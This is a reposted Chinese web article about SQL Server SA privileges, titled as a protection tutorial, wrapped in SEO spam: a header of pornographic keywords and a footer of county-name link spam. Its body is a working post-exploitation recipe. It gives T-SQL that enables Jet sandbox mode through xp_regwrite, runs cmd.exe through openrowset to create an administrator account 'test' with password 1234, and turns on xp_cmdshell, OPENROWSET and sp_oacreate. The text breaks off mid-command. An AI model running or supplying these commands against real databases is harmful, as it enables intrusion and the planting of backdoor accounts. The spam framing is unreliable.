国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > SQL Server > 正文

解讀SQL Server SA權限最新入侵防護教程

2024-08-31 00:46:30
字體:
來源:轉載
供稿:網友

使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:

 

Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE/Microsoft/Jet/4.0

 

  /Engines'',''SandBoxMode'',''REG_DWORD'',1

  然后執行沙盤命令,在系統添加一個用戶名為test,密碼為1234的用戶:

 

select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:/windows

 

  /system32/ias/ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'')

  select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:/windows

  /system32/ias/ias.mdb'',''select shell("cmd.exe /c net localgroup

  administrators test /add")'')

  不同的,路徑也不一樣,需要根據情況做修改:操作系統

  NT/2K: c:/winnt/system32/

  XP/2003: c:/windows/system32/

  另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開:

  開啟XP_cmdshell:

 

EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure

 

  ''xp_cmdshell'', 1;RECONFIGURE;

  開啟''OPENROWSET'': 

 

exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure

 

  ''Ad Hoc Distributed Queries'',1;RECONFIGURE;

  開啟''sp_oacreate'':  

 

exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp

 

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 蛟河市| 木兰县| 习水县| 历史| 宁津县| 抚宁县| 宜昌市| 正蓝旗| 松溪县| 东兴市| 嘉兴市| 延长县| 邹城市| 济阳县| 佛教| 宜川县| 始兴县| 高密市| 应用必备| 宁安市| 荔波县| 大洼县| 鲁山县| 大方县| 汾西县| 阿尔山市| 兴义市| 安乡县| 巴青县| 呼玛县| 神农架林区| 治县。| 民和| 南投县| 建平县| 乌拉特中旗| 株洲市| 弋阳县| 株洲市| 肥西县| 盐城市|